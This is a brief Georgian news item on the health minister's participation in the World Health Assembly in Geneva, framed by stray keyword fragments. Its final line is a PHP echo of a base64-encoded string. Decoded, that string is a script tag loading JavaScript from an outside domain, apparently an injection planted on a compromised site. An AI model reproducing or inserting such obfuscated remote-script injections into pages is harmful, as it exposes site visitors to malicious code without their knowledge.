celsiusi
ავერსი საქკაბელი

 ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრის მიხეილ სარჯველაძის ვიზიტი ჟენევაში გრძელდება, სადაც ჯანმრთელობის მსოფლიო ასამბლეაში მონაწილეობს. ინფორმაციას ჯანდაცვის სამინისტრო ავრცელებს.

უწყების ცნობით, ვიზიტის ფარგლებში გამართულ პლენარულ სესიებს, კომიტეტის სხდომებსა და ორმხრივ შეხვედრებს, ასევე, ესწრებიან მინისტრის პირველი მოადგილე თამარ გაბუნია და ჟენევაში, გაერო-ს განყოფილებასთან და სხვა საერთაშორისო ორგანიზაციებთან საქართველოს მუდმივი წარმომადგენელი ელჩი ალექსანდრე მაისურაძე.

მიხეილ სარჯველაძე, ჯანმრთელობის მსოფლიო ასამბლეის რიგით 77-ე სესიაზე სიტყვით გამოვა. გაიმართება შეხვედრა ჯანმრთელობის მსოფლიო ორგანიზაციის ევროპის რეგიონულ დირექტორ ჰანს კლუგესთან.

ვიზიტის ფარგლებში, ჯანდაცვის მინისტრი ამერიკის CDC-ს გლობალური ჯანმრთელობის ცენტრის ხელმძღვანელს, სომხეთის რესპუბლიკის ჯანდაცვის მინისტრსა და ჯანდაცვის მსოფლიო ორგანიზაციის, ჯანმრთელობის სოციალური განმსაზღვრელი დეპარტამენტის დირექტორს შეხვდა.

ჯანდაცვის მინისტრი, ასამბლეის დელეგატებისთვის გამართულ ტრადიციული მიღებას დაესწრო, რომელზეც სიტყვით ჯანმრთელობის მსოფლიო ორგანიზაციის ხელმძღვანელები გამოვიდნენ“,- აღნიშნულია ინფორმაციაში.

168
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");